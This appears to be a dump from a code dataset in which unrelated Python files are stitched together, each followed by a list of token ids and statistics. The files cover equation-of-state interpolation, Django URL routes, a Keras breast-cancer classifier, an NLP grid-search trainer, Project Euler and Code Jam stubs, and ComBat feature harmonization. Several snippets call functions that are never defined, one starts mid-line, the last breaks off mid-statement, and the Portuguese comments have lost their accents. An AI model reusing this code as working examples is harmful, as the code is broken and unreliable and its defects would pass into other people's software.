interpolate.interp1d(temperatures, pressures, kind='linear', fill_value='extrapolate') sorted_dict[i].update({'Pressure (Pa)': f_pressure(sorted_dict[i]['Temperature (K)'])}) f_soundspeed = interpolate.interp1d(temperatures, sound_speeds, kind='linear', fill_value='extrapolate') sorted_dict[i].update({'Sound speed (m/s)': f_soundspeed(sorted_dict[i]['Temperature (K)'])}) f_entropy = interpolate.interp1d(temperatures, entropies, kind='linear', fill_value='extrapolate') sorted_dict[i].update({'Entropy (J/kg/K)': f_entropy(sorted_dict[i]['Temperature (K)'])}) # infile_df = pd.read_csv(infile_path) # # density = sorted(list(set([reformat(i) for i in list(infile_df['Density (kg/m3)'])]))) # remove duplicates, then sort # temperature = sorted(list(set([reformat(i) for i in list(infile_df['Temperature (K)'])]))) # energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])] # pressure = [reformat(i) for i in list(infile_df['Pressure (Pa)'])] # sound_speed = [reformat(i) for i in list(infile_df['Sound speed (m/s)'])] # entropy = [reformat(i) for i in list(infile_df['Entropy (J/kg/K)'])] # # min_energy = min(energy) # max_energy = max(energy) # delta = (min_energy / max_energy)**(1 / (nu - 1)) # # new_energy = [min_energy * (delta**i) for i in range(0, nu)] # # new_temperature = [] # new_pressure = [] # new_sound_speed = [] # new_entropy = [] # # for m in range(0, nu): # # # internal energy # f_temperature = interpolate.interp1d(energy[m:], temperature[m:], kind='linear', fill_value='extrapolate') # new_temperature.append(f_temperature(new_energy)) # # # pressure # f_pressure = interpolate.interp1d(temperature[m:], pressure[m:], kind='linear', fill_value='extrapolate') # new_pressure.append(f_pressure(new_temperature[m])) # # # sound speed # f_soundspeed = interpolate.interp1d(temperature[m:], sound_speed[m:], kind='linear', fill_value='extrapolate') # new_sound_speed.append(f_soundspeed(new_temperature[m])) # # # entropy # f_entropy = interpolate.interp1d(temperature[m:], entropy[m:], kind='linear', fill_value='extrapolate') # new_entropy.append(f_entropy(new_temperature[m])) # # new_temperature = np.array(new_temperature) # new_pressure = np.array(new_pressure) # new_sound_speed = np.array(new_sound_speed) # new_entropy = np.array(new_entropy) # # for m in range(0, len(density), int(len(density)/6)): # # ax = [0, 0, 0, 0] # # fig = plt.figure(figsize = (10,6.128)) # # ax[0] = fig.add_subplot(221) # ax[1] = fig.add_subplot(222) # ax[2] = fig.add_subplot(223) # ax[3] = fig.add_subplot(224) # # ax[0].semilogy(np.array(temperature) * 1e-3, np.array(energy[m:]) * 1e-6, '--', label="original ANEOS") # ax[0].semilogy(new_temperature[m:] * 1e-3, np.array(new_energy[m:]) * 1e-6, '-.', label="modified") # ax[1].semilogy(np.array(temperature) * 1e-3, np.array(pressure[m:]) * 1e-6,'--', new_temperature[m:] * 1e-3, new_pressure[m:] * 1e-6,'-.') # ax[2].plot(np.array(temperature) * 1e-3, np.array(sound_speed[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_sound_speed[m:] * 1e-3,'-.') # ax[3].plot(np.array(temperature) * 1e-3, np.array(entropy[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_entropy[m:] * 1e-3,'-.') # # ax[0].legend(frameon=False) # # ax[0].set_ylabel('Energy (MJ/kg)', fontsize=10) # ax[1].set_ylabel('Pressure (MPa)', fontsize=10) # ax[2].set_ylabel('Sound Speed (km/s)', fontsize=10) # ax[3].set_ylabel('Entropy (kJ/K/kg)', fontsize=10) # ax[2].set_xlabel('Temperature ($10^3$ K)', fontsize=10) # ax[3].set_xlabel('Temperature ($10^3$ K)',fontsize=10) # # fig.suptitle("Density: %3.3f kg/m$^3$" %(density[m])) # # plt.show() # # fig.savefig("Density" + str(m) + ".png")
[ 37811, 198, 1212, 318, 257, 21015, 4226, 326, 26161, 334, 7, 81, 8873, 11, 309, 828, 350, 7, 81, 8873, 11, 309, 828, 327, 82, 7, 81, 8873, 11, 51, 828, 311, 7, 81, 8873, 11, 309, 8, 198, 1462, 309, 7, 81, 8873, 11, 334, 828,...
2.34402
2,433
from django.urls import path from . import views urlpatterns = [ path('post_posts', views.post_posts), path('fetch_posts', views.get_posts), path('fetch_post/<pk>', views.get_post), path('delete_post/<pk>', views.delete_post), path('edit_post/<pk>', views.edit_post), path('search_for_a_post', views.search_for_a_post) ]
[ 6738, 42625, 14208, 13, 6371, 82, 1330, 3108, 198, 6738, 764, 1330, 5009, 198, 198, 6371, 33279, 82, 796, 685, 198, 220, 220, 220, 3108, 10786, 7353, 62, 24875, 3256, 5009, 13, 7353, 62, 24875, 828, 198, 220, 220, 220, 3108, 10786, ...
2.402778
144
import os
[ 11748, 28686, 628, 628, 628, 628, 198 ]
2.571429
7
import numpy as np
[ 11748, 299, 32152, 355, 45941, 628 ]
3.333333
6
from django.contrib import admin from django.urls import path, include from rest_framework_jwt.views import ( obtain_jwt_token, refresh_jwt_token, ) urlpatterns = [ path('admin/', admin.site.urls), path('token-auth/', obtain_jwt_token), path('token-refresh/', refresh_jwt_token), path('employee/', include('employee.urls', namespace='employee')) ]
[ 6738, 42625, 14208, 13, 3642, 822, 1330, 13169, 198, 6738, 42625, 14208, 13, 6371, 82, 1330, 3108, 11, 2291, 198, 198, 6738, 1334, 62, 30604, 62, 73, 46569, 13, 33571, 1330, 357, 198, 220, 220, 220, 7330, 62, 73, 46569, 62, 30001, 1...
2.618056
144
#General libs import sys import os import json from datetime import datetime import time #Data wrangling libs import pandas as pd import numpy as np #DB related libs from sqlalchemy import create_engine #ML models related libs from sklearn.pipeline import Pipeline, FeatureUnion from sklearn.metrics import confusion_matrix from sklearn.model_selection import train_test_split from sklearn.multioutput import MultiOutputClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.neighbors import KNeighborsClassifier from sklearn.naive_bayes import GaussianNB from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.metrics import classification_report from sklearn.model_selection import GridSearchCV from sklearn.linear_model import LogisticRegression #Gensim from gensim.models import KeyedVectors #Custom Transformers and Estimators import nlp_estimators #Model Saver import dill #Workspace Utils from workspace_utils import active_session #Glove Models dictionary (to be filled in when needed) glove_models_by_size = {50: None, 100: None, 300: None} #Train Configurations to be filled in when script is called train_configs = {} def get_or_load_glove_model(num_dims): ''' INPUT num_dims - int, number of dimensions of the Glove model to be loaded OUTPUT glove_model - object, the pre-trained glove model with the specified number of dimensions This function either retrieves the already-stored glove model or loads and stores it from file using the train configuration `glove_models_folderpath` ''' if glove_models_by_size[num_dims] == None: print('Pre-trained Glove Model with {} dims not found. '\ '\nLoading it from file...'.format(num_dims)) glove_models_by_size[num_dims] = KeyedVectors.load_word2vec_format( os.path.join(train_configs['glove_models_folderpath'], 'glove.6B.{}d_word2vec.txt'.format(num_dims)), binary=False) return glove_models_by_size[num_dims] def load_data(database_filepath): ''' INPUT database_filepath - string, filepath of database from which data will be loaded OUTPUT X - numpy array, The raw messages ready to be used to train the pipelines X_tokenized - numpy array, The tokenized messages ready to be used to train the pipelines Y - numpy array, The list of categories to which each message belongs category_columns - pandas series, The names of the categories categories_tokens - numpy array, The tokenized categories names (to be used by cats_sim feature set) This function loads and prepares data for the models training ''' engine = create_engine('sqlite:///' + database_filepath) messages_df = pd.read_sql_table(con=engine, table_name='Message') categories_df = pd.read_sql_table(con=engine, table_name='CorpusWide') messages_tokens = pd.read_sql_table(con=engine, table_name='MessageTokens') X = messages_df.message.values X_tokenized = messages_tokens.tokens_str.values Y_df = categories_df.drop(['message_id', 'message', 'original', 'genre'], axis=1) Y = Y_df.values category_columns = Y_df.columns categories_tokens = np.array([np.array(cat.split('_')) for cat in category_columns]) return X, X_tokenized, Y, category_columns, categories_tokens def build_estimator_obj(estimator_code): ''' INPUT estimator_code - string, the code of the classifier object to be built OUTPUT classifier_obj - sklearn estimator, the built classifier object This function builds a classifier object based on the estimator code received as input. For unexpected codes, it prints an error and exits the script execution ''' classifier_obj = None if estimator_code == 'rf': classifier_obj = RandomForestClassifier() elif estimator_code == 'lr': classifier_obj = LogisticRegression() else: print("Invalid Classifier Estimator Code " + estimator_code) exit(1) return classifier_obj def build_classifiers_build_params(classifiers_configs): ''' INPUT classifiers_configs - dict, a dictionary containing the configuration for each classifier OUTPUT classifiers_params_dict - dict, a dictionary containing the grid params to be used for each classifier in the training process This function builds a dictionary with grid params to be used in training process for each classifier whose configurations were given as input. It can handle a single classifier or a list of classifiers. ''' if len(classifiers_configs) > 1: classifiers_params_list = [] classifiers_params_dict = {} for classifier in classifiers_configs: classifier_estimator = classifier['estimator'] classifier_obj = build_estimator_obj(classifier_estimator) classifier_obj = MultiOutputClassifier(classifier_obj.set_params(**classifier['params'])) classifiers_params_list.append(classifier_obj) classifiers_params_dict['clf'] = classifiers_params_list elif len(classifiers_configs) == 1: classifier = classifiers_configs[0] classifier_estimator = classifier['estimator'] classifier_obj = build_estimator_obj(classifier_estimator) classifier_obj = MultiOutputClassifier(classifier_obj) classifiers_params_dict = {'clf' : [classifier_obj]} classifiers_params_dict.update(classifier['params']) print(classifiers_params_dict) return classifiers_params_dict def build_model(model_config,classifiers_params,categories_tokens): ''' INPUT model_config - dict, a dictionary containing the configuration for a model pipeline classifiers_configs - dict, a dictionary containing the configuration for each classifier categories_tokens - numpy array, array containing the tokenized categories names OUTPUT grid_search_cv - sklearn GridSearchCV, a grid search CV object containing specifications on how to train the model based on the input configs This function builds a Grid Search CV object with specifications for training process for a given model and its classifiers whose configurations were given as input. It can handle different feature_sets: - Local Word2Vec - Pre-Trained Glove - Doc2Vec - Category Similarity - All Features Sets together ''' feature_set = model_config['feature_set'] print("Building Model for feature set: {}".format(feature_set)) print("Grid Params: {}".format(model_config['grid_params'])) pipeline = grid_search_params = grid_search_cv = None jobs = -1 score = 'f1_micro' def_cv = 3 verbosity_level=10 if feature_set == 'local_w2v': pipeline = Pipeline([ ('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer()), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = model_config['grid_params'] elif feature_set == 'glove': pipeline = Pipeline([ ('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer( get_or_load_glove_model(50))), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = {'glove__word2vec_model' : [get_or_load_glove_model(num_dims) for num_dims in model_config['grid_params']['glove__num_dims']]} elif feature_set == 'doc2vec': pipeline = Pipeline([ ('doc2vec', nlp_estimators.Doc2VecTransformer()), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = model_config['grid_params'] elif feature_set == 'cats_sim': pipeline = Pipeline([ ('cats_sim', nlp_estimators.CategoriesSimilarity( categories_tokens=categories_tokens)), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = {'cats_sim__word2vec_model' : [get_or_load_glove_model(num_dims) for num_dims in model_config['grid_params']['cats_sim__num_dims']]} elif feature_set == 'all_feats': pipeline = Pipeline([ ('features', FeatureUnion([ ('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer(num_dims=50)), ('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer( get_or_load_glove_model(50) )), ('doc2vec', nlp_estimators.Doc2VecTransformer(vector_size=50)), ('cats_sim', nlp_estimators.CategoriesSimilarity(categories_tokens=categories_tokens, word2vec_model=get_or_load_glove_model(50))) ])), ('clf', MultiOutputClassifier(GaussianNB())) ]) grid_search_params = model_config['grid_params'] else: print("Error: Invalid Feature Set: " + feature_set) sys.exit(1) # Adds classifiers params to grid params grid_search_params.update(classifiers_params) grid_search_cv = GridSearchCV(estimator=pipeline, param_grid=grid_search_params, scoring=score, cv=def_cv, n_jobs=jobs, verbose=verbosity_level) return grid_search_cv def evaluate_model(model, X_test, Y_test, category_names): ''' INPUT model - sklearn GridSearchCV, the GridSearch containing the model with best performance on the training set X_test - numpy array, tokenized messages ready to be used to test the fit pipelines Y_test - numpy array, array containing the tokenized categories names for the test set category_names - pandas series, the categories names OUTPUT test_score - float, the score of the input model on the test data This function runs the model with best performance on the training set on the test dataset, printing the precision, recall and f-1 per category and returning the overall prediction score. ''' print('Best params: %s' % model.best_params_) # Best training data accuracy print('Best training score: %.3f' % model.best_score_) # Predict on test data with best params Y_pred = model.predict(X_test) test_score = model.score(X_test, Y_test) # Test data accuracy of model with best params print('Test set score for best params: %.3f ' % test_score) for category_idx in range(len(category_names)): print(classification_report(y_pred=Y_pred[:,category_idx], y_true=Y_test[:,category_idx], labels=[0,1], target_names=[category_names[category_idx] + '-0', category_names[category_idx] + '-1'])) return test_score def save_model(model, model_filepath): ''' INPUT model - sklearn Estimator, the model with best performance on the training set model_filepath - string, path where model picke will be saved This function saves the model with best performance on the training set to a given filepath. ''' # Output a pickle file for the model with open(model_filepath,'wb') as f: dill.dump(model, f) def build_grid_search_results_df(gs_results, gs_name, test_score): ''' INPUT gs_results - dict, dictionary containing the results of GridSearchCV training gs_name - string, the name of the GridSearchCV feature set test_score - float, the score of the best performing model of the GridSearchCV on the test set OUTPUT gs_results_df - pandas DataFrame, a dataframe holding information of the GridSearchCV results (train and test) for record This function builds a dataframe with information of the GridSearchCV results (train and test) for record. ''' gs_results_df = pd.DataFrame(gs_results) gs_results_df['grid_id'] = gs_name gs_results_df['best_model_test_score'] = test_score gs_results_df['param_set_order'] = np.arange(len(gs_results_df)) return gs_results_df def run_grid_search(): ''' This function runs the whole model selection phase: - Load Data from DB - Build Model - Run GridSearch - Save results to file - Save best model pickle file ''' start = time.time() print("Train configuration:") print(json.dumps(train_configs, indent=4)) print('Loading data...\n DATABASE: {}'.format(train_configs['database_filepath'])) X, X_tokenized, Y, category_names, categories_tokens = load_data(train_configs['database_filepath']) X_train, X_test, Y_train, Y_test = train_test_split(X_tokenized, Y, test_size=0.25) classifiers_params = build_classifiers_build_params(train_configs['classifiers']) print('Running GridSearch on models parameters...') best_score = 0.0 best_gs = '' overall_results_df = pd.DataFrame() for model_config in train_configs['models']: print('Building model...') model = build_model(model_config, classifiers_params, categories_tokens) print('Training model...') model.fit(X_train, Y_train) print('Evaluating model...') test_score = evaluate_model(model, X_test, Y_test, category_names) gs_results_df = build_grid_search_results_df(model.cv_results_, model_config['feature_set'], test_score) overall_results_df = pd.concat([overall_results_df, gs_results_df]) print('Saving model...\n MODEL: {}'.format( model_config['model_ouput_filepath'])) save_model(model.best_estimator_, model_config['model_ouput_filepath']) print('Trained model saved!') # Track best (highest test accuracy) model if test_score > best_score: best_score = test_score best_gs = model_config['feature_set'] output_filepath = train_configs['results_folderpath'] + \ 'res-' + train_configs['name'] + '-' + \ datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + \ '.csv' print('Saving Results...\n FILEPATH: {}'.format(output_filepath)) overall_results_df.to_csv(output_filepath, index=False) print('\nClassifier with best test set accuracy: %s' % best_gs) end = time.time() print("Training Time: " + str(int(end - start)) + "s") if __name__ == '__main__': main()
[ 2, 12218, 9195, 82, 198, 11748, 25064, 198, 11748, 28686, 198, 11748, 33918, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 11748, 640, 198, 198, 2, 6601, 1319, 27499, 9195, 82, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 299, 32...
2.402943
6,321
import struct MAX_UINT = 2 ** (struct.calcsize('I') * 8) - 1 MAX_ULONG = 2 ** (struct.calcsize('L') * 8) - 1 UINT8_T = 1 UINT32_T = 4 UINT64_T = 8
[ 11748, 2878, 198, 198, 22921, 62, 52, 12394, 796, 362, 12429, 357, 7249, 13, 9948, 6359, 1096, 10786, 40, 11537, 1635, 807, 8, 532, 352, 198, 22921, 62, 6239, 18494, 796, 362, 12429, 357, 7249, 13, 9948, 6359, 1096, 10786, 43, 11537, ...
2.055556
72
import pytest from django.contrib.auth.models import User from django.urls import reverse from selenium.webdriver.common.by import By from .base import AuthorBaseFunctionalTest
[ 11748, 12972, 9288, 198, 6738, 42625, 14208, 13, 3642, 822, 13, 18439, 13, 27530, 1330, 11787, 198, 6738, 42625, 14208, 13, 6371, 82, 1330, 9575, 198, 6738, 384, 11925, 1505, 13, 12384, 26230, 13, 11321, 13, 1525, 1330, 2750, 198, 198, ...
3.509804
51
from .commons import VCFEntry, LabeledMat
[ 6738, 764, 9503, 684, 1330, 569, 22495, 30150, 11, 3498, 18449, 19044, 198 ]
3.230769
13
from simulation.common import Storage from simulation.common import BatteryEmptyError
[ 6738, 18640, 13, 11321, 1330, 20514, 198, 6738, 18640, 13, 11321, 1330, 23490, 40613, 12331, 628 ]
5.4375
16
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Wed Oct 17 21:04:48 2018 @author: Alex Alves Programa para determinar se um tumor de mama benigno (saida 0) ou maligno (saida 1) """ import pandas as pa # Importao para poder dividir os dados entre treinamento da rede e testes de validao from sklearn.model_selection import train_test_split import keras from keras.models import Sequential from keras.layers import Dense from sklearn.metrics import confusion_matrix, accuracy_score entrada = pa.read_csv('entradas-breast.csv') esperado = pa.read_csv('saidas-breast.csv') # Treinamento com 75% e validao com 25% entrada_treinar, entrada_teste, esperado_treinar,esperado_teste =train_test_split(entrada,esperado,test_size=0.25) # Criando a rede neural detectar_cancer = Sequential() #Adicionando camada de entrada detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform',input_dim=30)) #Adicionando uma camada oculta detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform')) # Adicionando camada de saida detectar_cancer.add(Dense(units=1,activation='sigmoid')) # Compilar a rede #compile(descida_gradiente,funo do erro- MSE, preciso da rede) # clipvalue -> delimita os valores dos pesos entre 0.5 e -0.5 # lr = tamanho do passo, decay-> reduo do passo otimizar = keras.optimizers.Adam(lr=0.001,decay=0.0001) # Nesse caso o clipvalue prejudicou #otimizar = keras.optimizers.Adam(lr=0.004,decay=0.0001,clipvalue=0.5) detectar_cancer.compile(otimizar,loss='binary_crossentropy',metrics=['binary_accuracy']) #detectar_cancer.compile(optimizer='adam',loss='binary_crossentropy',metrics=['binary_accuracy']) # Fazer o treinamento da rede - erro calculado para 10 amostras #depois atualiza os pesos -descida do gradiente estocasticos de 10 em 10 amostras detectar_cancer.fit(entrada_treinar,esperado_treinar,batch_size=10,epochs=100) # Pegando os pesos pesosCamadaEntrada = detectar_cancer.layers[0].get_weights() pesosCamadaOculta = detectar_cancer.layers[1].get_weights() pesosCamadaSaida = detectar_cancer.layers[2].get_weights() # Realizando teste de validao # retorna probabilidade de acerto validar = detectar_cancer.predict(entrada_teste) # convertendo para true ou false (1 ou 0) para comparar # se for maior que 0.5 true, caso contrrio false validar = (validar > 0.5) # compara os 2 vetores e calcula a porcentagem de acerto # da rede usando o conjunto de treinamento precisao = accuracy_score(esperado_teste,validar) # Matriz de acertos da rede acertos = confusion_matrix(esperado_teste,validar) # Outra maneira de resultado # retorna o erro e a preciso resultado = detectar_cancer.evaluate(entrada_teste, esperado_teste)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 17, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 37811, 198, 41972, 319, 3300, 2556, 1596, 2310, 25, 3023, 25, 2780, 2864, 198, 198, 31, 9800, 25, 4422, 978, 1158...
2.661808
1,029
# Solution of; # Project Euler Problem 736: Paths to Equality # https://projecteuler.net/problem=736 # # Define two functions on lattice points:$r(x,y) = (x+1,2y)$$s(x,y) = # (2x,y+1)$A path to equality of length $n$ for a pair $(a,b)$ is a sequence # $\Big((a_1,b_1),(a_2,b_2),\ldots,(a_n,b_n)\Big)$, where:$(a_1,b_1) = # (a,b)$$(a_k,b_k) = r(a_{k-1},b_{k-1})$ or $(a_k,b_k) = s(a_{k-1},b_{k-1})$ # for $k > 1$$a_k \ne b_k$ for $k < n$$a_n = b_n$$a_n = b_n$ is called the # final value. For example,$(45,90)\xrightarrow{r} # (46,180)\xrightarrow{s}(92,181)\xrightarrow{s}(184,182)\xrightarrow{s}(368,183)\xrightarrow{s}(736,184)\xrightarrow{r}$$(737,368)\xrightarrow{s}(1474,369)\xrightarrow{r}(1475,738)\xrightarrow{r}(1476,1476)$This # is a path to equality for $(45,90)$ and is of length 10 with final value # 1476. There is no path to equality of $(45,90)$ with smaller length. Find # the unique path to equality for $(45,90)$ with smallest odd length. Enter # the final value as your answer. # # by lcsm29 http://github.com/lcsm29/project-euler import timed if __name__ == '__main__': n = 1000 i = 10000 prob_id = 736 timed.caller(dummy, n, i, prob_id)
[ 2, 28186, 286, 26, 198, 2, 4935, 412, 18173, 20647, 767, 2623, 25, 10644, 82, 284, 31428, 198, 2, 3740, 1378, 16302, 68, 18173, 13, 3262, 14, 45573, 28, 49150, 198, 2, 220, 198, 2, 2896, 500, 734, 5499, 319, 47240, 501, 2173, 25, ...
2.183486
545
#!/usr/bin/env python3 # https://codingcompetitions.withgoogle.com/codejam/round/000000000019fd27/0000000000209a9e t, b = map(int, input().split()) for _ in range(t): xs = [None] * b q, k, k1, k2 = 0, 0, None, None while True: if q > 0 and q % 10 == 0: if k1 is not None and k2 is not None: v1 = query(k1+1) v2 = query(k2+1) if xs[k1] == v1 and xs[k2] == v2: pass elif xs[k1] != v1 and xs[k2] != v2: complement() elif xs[k1] != v1: xs = xs[::-1] complement() else: xs = xs[::-1] elif k1 is not None: v1 = query(k1+1) v1 = query(k1+1) if xs[k1] != v1: complement() else: v2 = query(k2+1) v2 = query(k2+1) if xs[k2] != v2: xs = xs[::-1] else: v1 = query(k+1) v2 = query(b-k) xs[k] = v1 xs[b-k-1] = v2 if v1 == v2 and k1 is None: k1 = k elif v1 != v2 and k2 is None: k2 = k k += 1 if k*2 == b: solve() break
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 3740, 1378, 66, 7656, 5589, 316, 1756, 13, 4480, 13297, 13, 785, 14, 8189, 39159, 14, 744, 14, 8269, 405, 1129, 16344, 1983, 14, 8269, 405, 22567, 64, 24, 68, 198, 83, 11, ...
1.450054
931
import requests from Stephanie.configurer import config
[ 11748, 7007, 198, 6738, 26085, 13, 11250, 15051, 1330, 4566, 628 ]
5.181818
11
#!/usr/bin/env python # Copyright 2020 Biomedical Imaging Group Rotterdam, Departments of # Medical Informatics and Radiology, Erasmus MC, Rotterdam, The Netherlands # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import subprocess import scipy.io as sio import WORC.IOparser.file_io as wio import WORC.IOparser.config_io_combat as cio import numpy as np import random import pandas as pd from WORC.addexceptions import WORCValueError, WORCKeyError import tempfile from sys import platform from WORC.featureprocessing.VarianceThreshold import selfeat_variance from sklearn.preprocessing import StandardScaler from neuroCombat import neuroCombat import matplotlib matplotlib.use('agg') import matplotlib.pyplot as plt from WORC.featureprocessing.Imputer import Imputer def ComBat(features_train_in, labels_train, config, features_train_out, features_test_in=None, labels_test=None, features_test_out=None, VarianceThreshold=True, scaler=False, logarithmic=False): """ Apply ComBat feature harmonization. Based on: https://github.com/Jfortin1/ComBatHarmonization """ # Load the config print('############################################################') print('# Initializing ComBat. #') print('############################################################\n') config = cio.load_config(config) excluded_features = config['ComBat']['excluded_features'] # If mod, than also load moderating labels if config['ComBat']['mod'][0] == '[]': label_names = config['ComBat']['batch'] else: label_names = config['ComBat']['batch'] + config['ComBat']['mod'] # Load the features for both training and testing, match with batch and mod parameters label_data_train, image_features_train =\ wio.load_features(features_train_in, patientinfo=labels_train, label_type=label_names) feature_labels = image_features_train[0][1] image_features_train = [i[0] for i in image_features_train] label_data_train['patient_IDs'] = list(label_data_train['patient_IDs']) # Exclude features if excluded_features: print(f'\t Excluding features containing: {excluded_features}') # Determine indices of excluded features included_feature_indices = [] excluded_feature_indices = [] for fnum, i in enumerate(feature_labels): if not any(e in i for e in excluded_features): included_feature_indices.append(fnum) else: excluded_feature_indices.append(fnum) # Actually exclude the features image_features_train_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_train] feature_labels_combat = np.asarray(feature_labels)[included_feature_indices].tolist() image_features_train_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_train] feature_labels_noncombat = np.asarray(feature_labels)[excluded_feature_indices].tolist() else: image_features_train_combat = image_features_train feature_labels_combat = feature_labels.tolist() image_features_train_noncombat = [] feature_labels_noncombat = [] # Detect NaNs, otherwise first feature imputation is required if any(np.isnan(a) for a in np.asarray(image_features_train_combat).flatten()): print('\t [WARNING] NaNs detected, applying median imputation') imputer = Imputer(missing_values=np.nan, strategy='median') imputer.fit(image_features_train_combat) image_features_train_combat = imputer.transform(image_features_train_combat) else: imputer = None # Apply a scaler to the features if scaler: print('\t Fitting scaler on dataset.') scaler = StandardScaler().fit(image_features_train_combat) image_features_train_combat = scaler.transform(image_features_train_combat) # Remove features with a constant value if VarianceThreshold: print(f'\t Applying variance threshold on dataset.') image_features_train_combat, feature_labels_combat, VarSel =\ selfeat_variance(image_features_train_combat, np.asarray([feature_labels_combat])) feature_labels_combat = feature_labels_combat[0].tolist() if features_test_in: label_data_test, image_features_test =\ wio.load_features(features_test_in, patientinfo=labels_test, label_type=label_names) image_features_test = [i[0] for i in image_features_test] label_data_test['patient_IDs'] = list(label_data_test['patient_IDs']) if excluded_features: image_features_test_combat = [np.asarray(i)[included_feature_indices].tolist() for i in image_features_test] image_features_test_noncombat = [np.asarray(i)[excluded_feature_indices].tolist() for i in image_features_test] else: image_features_test_combat = image_features_test image_features_test_noncombat = [] # Apply imputation if required if imputer is not None: image_features_test_combat = imputer.transform(image_features_test_combat) # Apply a scaler to the features if scaler: image_features_test_combat = scaler.transform(image_features_test_combat) # Remove features with a constant value if VarianceThreshold: image_features_test_combat = VarSel.transform(image_features_test_combat) all_features = image_features_train_combat.tolist() + image_features_test_combat.tolist() all_labels = list() for i in range(label_data_train['label'].shape[0]): all_labels.append(label_data_train['label'][i, :, 0].tolist() + label_data_test['label'][i, :, 0].tolist()) all_labels = np.asarray(all_labels) else: all_features = image_features_train_combat.tolist() all_labels = label_data_train['label'] # Convert data to a single array all_features_matrix = np.asarray(all_features) all_labels = np.squeeze(all_labels) # Apply logarithm if required if logarithmic: print('\t Taking log10 of features before applying ComBat.') all_features_matrix = np.log10(all_features_matrix) # Convert all_labels to dictionary if len(all_labels.shape) == 1: # No mod variables all_labels = {label_data_train['label_name'][0]: all_labels} else: all_labels = {k: v for k, v in zip(label_data_train['label_name'], all_labels)} # Split labels in batch and moderation labels bat = config['ComBat']['batch'] mod = config['ComBat']['mod'] print(f'\t Using batch variable {bat}, mod variables {mod}.') batch = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['batch']] batch = batch[0] if config['ComBat']['mod'][0] == '[]': mod = None else: mod = [all_labels[l] for l in all_labels.keys() if l in config['ComBat']['mod']] # Set parameters for output files parameters = {'batch': config['ComBat']['batch'], 'mod': config['ComBat']['mod'], 'par': config['ComBat']['par']} name = 'Image features: ComBat corrected' panda_labels = ['parameters', 'patient', 'feature_values', 'feature_labels'] feature_labels = feature_labels_combat + feature_labels_noncombat # Convert all inputs to arrays with right shape all_features_matrix = np.transpose(all_features_matrix) if mod is not None: mod = np.transpose(np.asarray(mod)) # Patients identified with batch -1.0 should be skipped skipname = 'Image features: ComBat skipped' ntrain = len(image_features_train_combat) ndel = 0 print(features_test_out) for bnum, b in enumerate(batch): bnum -= ndel if b == -1.0: if bnum < ntrain - ndel: # Training patient print('train') pid = label_data_train['patient_IDs'][bnum] out = features_train_out[bnum] # Combine ComBat and non-ComBat features feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_train_noncombat[bnum]) # Delete patient for later processing del label_data_train['patient_IDs'][bnum] del image_features_train_noncombat[bnum] del features_train_out[bnum] image_features_train_combat = np.delete(image_features_train_combat, bnum, 0) else: # Test patient print('test') pid = label_data_test['patient_IDs'][bnum - ntrain] out = features_test_out[bnum - ntrain] # Combine ComBat and non-ComBat features feature_values_temp = list(all_features_matrix[:, bnum]) + list(image_features_test_noncombat[bnum - ntrain]) # Delete patient for later processing del label_data_test['patient_IDs'][bnum - ntrain] del image_features_test_noncombat[bnum - ntrain] del features_test_out[bnum - ntrain] image_features_test_combat = np.delete(image_features_test_combat, bnum - ntrain, 0) # Delete some other variables for later processing all_features_matrix = np.delete(all_features_matrix, bnum, 1) if mod is not None: mod = np.delete(mod, bnum, 0) batch = np.delete(batch, bnum, 0) # Notify user print(f'[WARNING] Skipping patient {pid} as batch variable is -1.0.') # Sort based on feature label feature_labels_temp, feature_values_temp =\ zip(*sorted(zip(feature_labels, feature_values_temp))) # Convert to pandas Series and save as hdf5 panda_data = pd.Series([parameters, pid, feature_values_temp, feature_labels_temp], index=panda_labels, name=skipname ) print(f'\t Saving image features to: {out}.') panda_data.to_hdf(out, 'image_features') ndel += 1 print(features_test_out) # Run ComBat in Matlab if config['ComBat']['language'] == 'matlab': print('\t Executing ComBat through Matlab') data_harmonized = ComBatMatlab(dat=all_features_matrix, batch=batch, command=config['ComBat']['matlab'], mod=mod, par=config['ComBat']['par'], per_feature=config['ComBat']['per_feature']) elif config['ComBat']['language'] == 'python': print('\t Executing ComBat through neuroComBat in Python') data_harmonized = ComBatPython(dat=all_features_matrix, batch=batch, mod=mod, eb=config['ComBat']['eb'], par=config['ComBat']['par'], per_feature=config['ComBat']['per_feature']) else: raise WORCKeyError(f"Language {config['ComBat']['language']} unknown.") # Convert values back if logarithm was used if logarithmic: data_harmonized = 10 ** data_harmonized # Convert again to train hdf5 files feature_values_train_combat = [data_harmonized[:, i] for i in range(len(image_features_train_combat))] for fnum, i_feat in enumerate(feature_values_train_combat): # Combine ComBat and non-ComBat features feature_values_temp = 